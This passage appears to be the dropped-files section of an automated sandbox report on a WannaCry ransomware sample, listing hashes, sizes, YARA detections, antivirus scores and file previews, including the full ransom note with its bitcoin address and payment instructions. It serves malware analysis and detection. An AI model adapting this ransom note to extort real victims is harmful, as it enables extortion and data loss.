                                SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):91501
                                Entropy (8bit):4.841830504507431
                                Encrypted:false
                                SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                MD5:6735CB43FE44832B061EEB3F5956B099
                                SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):41169
                                Entropy (8bit):5.030695296195755
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37577
                                Entropy (8bit):5.025836823617116
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                MD5:FF70CC7C00951084175D12128CE02399
                                SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):39896
                                Entropy (8bit):5.048541002474746
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37917
                                Entropy (8bit):5.027872281764284
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):52161
                                Entropy (8bit):4.964306949910696
                                Encrypted:false
                                SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                MD5:313E0ECECD24F4FA1504118A11BC7986
                                SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):47108
                                Entropy (8bit):4.952777691675008
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                MD5:452615DB2336D60AF7E2057481E4CAB5
                                SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):41391
                                Entropy (8bit):5.027730966276624
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37381
                                Entropy (8bit):5.02443306661187
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):38483
                                Entropy (8bit):5.022972736625151
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):42582
                                Entropy (8bit):5.010722377068833
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                MD5:531BA6B1A5460FC9446946F91CC8C94B
                                SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):93778
                                Entropy (8bit):4.76206134900188
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                MD5:8419BE28A0DCEC3F55823620922B00FA
                                SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):864
                                Entropy (8bit):4.5335184780121995
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                MD5:3E0020FC529B1C2A061016DD2469BA96
                                SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                Malicious:false
                                Yara Hits:
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):3038286
                                Entropy (8bit):7.998263053003918
                                Encrypted:true
                                SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65816
                                Entropy (8bit):7.997276137881339
                                Encrypted:true
                                SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):3.1664845408760636
                                Encrypted:false
                                SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                MD5:4FEF5E34143E646DBF9907C4374276F5
                                SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 89%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):2.5252509618107535
                                Encrypted:false
                                SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                MD5:8495400F199AC77853C53B5A3F278F3E
                                SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 89%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.81044533136706
                                Encrypted:false
                                SSDEEP:24:k2tz1RMHRzEvgcCSUVP5tz1BujBke7ecSuv1H/V3Vfcp9aMiYI:k2tz1KHFEgWUVBt5BwB7UuptmpHI
                                MD5:C6D59EA6F66DF54A959A4E1109AA7AD2
                                SHA1:EAA7B5D45F760010447102697832E78847E48C8D
                                SHA-256:50F3E2C8514E0730D3D8286D225964F5A9F08B64AEE55A4E3317D91B0153EDF3
                                SHA-512:6C12864ED7687E2D1F9EC88DA94D5E05D7128AFFF416A0848C6E9BA096E7E3B4EA1A209121F61AA1A711CB015A4D5784794F8E0F49809AE2505D1394283D5A69
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854841549787096
                                Encrypted:false
                                SSDEEP:24:bkHKIs+9W3iAVXGO+Y8UhPUvxvOWEqQ4y3lEMvFQWrQ6x5FOdT6sKuEfp8nOknA:bkU+9WSAVXLp8SPqxvLQ4SlESRU6fsTE
                                MD5:9D4BA0CE039A7136989E2C13C1420711
                                SHA1:8DD2FF2295F0CD64E39B5B57F10BD29453AB368F
                                SHA-256:27370802315EC4CD60378F42E545AA1F652994801F2901A3AB4CB0184591418A
                                SHA-512:20446607ED09BA7AA0542F314C228976D35E5780B12E69F9E349AF5A5F0C8569EF7E514B0CB53A5974BE9FE5F117E46B3F4126ED295CF13B164066CB2BE5EA53
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854841549787096
                                Encrypted:false
                                SSDEEP:24:bkHKIs+9W3iAVXGO+Y8UhPUvxvOWEqQ4y3lEMvFQWrQ6x5FOdT6sKuEfp8nOknA:bkU+9WSAVXLp8SPqxvLQ4SlESRU6fsTE
                                MD5:9D4BA0CE039A7136989E2C13C1420711
                                SHA1:8DD2FF2295F0CD64E39B5B57F10BD29453AB368F
                                SHA-256:27370802315EC4CD60378F42E545AA1F652994801F2901A3AB4CB0184591418A
                                SHA-512:20446607ED09BA7AA0542F314C228976D35E5780B12E69F9E349AF5A5F0C8569EF7E514B0CB53A5974BE9FE5F117E46B3F4126ED295CF13B164066CB2BE5EA53
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.791705065444209
                                Encrypted:false
                                SSDEEP:24:m2Qs3BAXp3BN56fwMEPJ5IgfeyzEbpkbsizYjzYHFMD/t:BQjB6yPgVWtbsizYjzMK
                                MD5:026E47DF362D058D7F1699C9A42B2D4D
                                SHA1:3B9A8CC4DA2FC08BECFC340133603F6432DF1B2D
                                SHA-256:E0C6E25B1EAC4B65C79D311E5531DEC6FF7E61459C49731D1AFE739576B8EC98
                                SHA-512:17AB69ECF626A050DAE4AF0A190CB56C8A79AE8AE5FD784443879EB2652833CA691AF8B009BBEDB01A7840BF7C4ECF0D9270287CE3F7A8166BD51210C158721C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827471222352906
                                Encrypted:false
                                SSDEEP:24:bkIU2uwfZ7d8cLKdVPifCx6yLjsiSiGbapTceMzZ33HUUkb:bkF2h9d87dVIzyjsBuglzZ330T
                                MD5:59C1EE5DD59669B48633C9E73B4A4747
                                SHA1:0101C26D66D2D9D27EFBA82628C592738A9089A6
                                SHA-256:ACBF71285056DD83B65090CB620EDA2C66C8A599F2B732BFE5FD02D76DDD858F
                                SHA-512:E61ECF922826FB7308D623E60B284D3B35753237801A639C780D44482C1BD1CE86A98AE79B35E5E71DF110A20E8C4BCD7AD02E35B419DE156F884F4072EB9491
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827471222352906
                                Encrypted:false
                                SSDEEP:24:bkIU2uwfZ7d8cLKdVPifCx6yLjsiSiGbapTceMzZ33HUUkb:bkF2h9d87dVIzyjsBuglzZ330T
                                MD5:59C1EE5DD59669B48633C9E73B4A4747
                                SHA1:0101C26D66D2D9D27EFBA82628C592738A9089A6
                                SHA-256:ACBF71285056DD83B65090CB620EDA2C66C8A599F2B732BFE5FD02D76DDD858F
                                SHA-512:E61ECF922826FB7308D623E60B284D3B35753237801A639C780D44482C1BD1CE86A98AE79B35E5E71DF110A20E8C4BCD7AD02E35B419DE156F884F4072EB9491
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.773353073231738
                                Encrypted:false
                                SSDEEP:24:Ze2JAWzz9RCj7S1Htdq57aNmqKm7EGVlJu/:Z5AW9QnS1Nc70K2NVvq
                                MD5:BA560958B10E5F1271D32CD2D24AC5A7
                                SHA1:292E4C1AB3DDC84EDE281FB2AB65778661615F1F
                                SHA-256:AF79515BC6AEE189FDD5817D1C9692045E836B19F1CF244E8603A348E5ABDF5E
                                SHA-512:CAD7BE9D1CF2C93A9F4A92420D3AE6F101819B54FC23F0FE081283502DED9FF503A21F9D7E950E1A8A2505917FDF7291D682D4F777E545E906FB2BC5CAD6E37E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.871511155937053
                                Encrypted:false
                                SSDEEP:24:bkdPfjJo2acMYI3s55tpAYQh8NnDPCEEI/KvxEPx0/eMNJGFISxufPIOcL0Xr2sZ:bk/ukT5bY8N9/wGRMNUFIvf1/uU
                                MD5:7533F179AC1C67DADED1C0595E356032
                                SHA1:3BC181C9CC0EDCB141737AAC968BDA2FB3007324
                                SHA-256:DE341D9D12646546759AC08CF7FDE5B09B7D8E6536914866D889F8A9770E059B
                                SHA-512:533E3E1A267CF8AC78299EB2B89EDC63E156452DD937D71C458831252AA005E0DEEBB0C042CB23A6BE97BA742CD4AC5FBE22075B915847DF18E64552EF9B93A4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.871511155937053
                                Encrypted:false
                                SSDEEP:24:bkdPfjJo2acMYI3s55tpAYQh8NnDPCEEI/KvxEPx0/eMNJGFISxufPIOcL0Xr2sZ:bk/ukT5bY8N9/wGRMNUFIvf1/uU
                                MD5:7533F179AC1C67DADED1C0595E356032
                                SHA1:3BC181C9CC0EDCB141737AAC968BDA2FB3007324
                                SHA-256:DE341D9D12646546759AC08CF7FDE5B09B7D8E6536914866D889F8A9770E059B
                                SHA-512:533E3E1A267CF8AC78299EB2B89EDC63E156452DD937D71C458831252AA005E0DEEBB0C042CB23A6BE97BA742CD4AC5FBE22075B915847DF18E64552EF9B93A4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8053895262141735
                                Encrypted:false
                                SSDEEP:24:/oGygW4vXQ2dfaiZbLfhWLRTvkZ8rPhktACx3Q:FrhNZbLpWNTvk+h5
                                MD5:3B13ED3F0883F7055D33AAE104565A27
                                SHA1:652B535F7E9FB1B90836EE4DFF1B84A689BEB52D
                                SHA-256:FCEA2195826CCE612D914A97075AE2260EE1E1BBA70F4BDBAE48174E2676687F
                                SHA-512:5D06B1D327DFFC8B8B2E600428BA516F2F388B8B59833A97F1F653903982017183AF65C5E6EA7ED15001BB37D7A7B061F3EA35615B82055132617C2AEF638E44
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.848398801601788
                                Encrypted:false
                                SSDEEP:24:bkBlvkHXlAra+QWNWaGBYdorhPn5CDcevgrbf0ASHBINIAWj9:bkoArrQ6WaqY2Pn4DcWAgbf9
                                MD5:696D39D76CCEF1F3E7DA9CA80A083C4C
                                SHA1:19081610EBFE348960308B32978B54BB5EA8BC77
                                SHA-256:3EDD80FC375833B678FFD0D29B802A2D8373F454BE0E3A085A84429F050C6C6D
                                SHA-512:9C74E7C04EC4FA3394845D2638A55F37B86BD5FC522D795EA29A8008AA45F6378016C97DF90AF83D28BC4731D77F1E0660BC6A2A3A82E9E2A8968C5B5B0A8EE7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.848398801601788
                                Encrypted:false
                                SSDEEP:24:bkBlvkHXlAra+QWNWaGBYdorhPn5CDcevgrbf0ASHBINIAWj9:bkoArrQ6WaqY2Pn4DcWAgbf9
                                MD5:696D39D76CCEF1F3E7DA9CA80A083C4C
                                SHA1:19081610EBFE348960308B32978B54BB5EA8BC77
                                SHA-256:3EDD80FC375833B678FFD0D29B802A2D8373F454BE0E3A085A84429F050C6C6D
                                SHA-512:9C74E7C04EC4FA3394845D2638A55F37B86BD5FC522D795EA29A8008AA45F6378016C97DF90AF83D28BC4731D77F1E0660BC6A2A3A82E9E2A8968C5B5B0A8EE7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
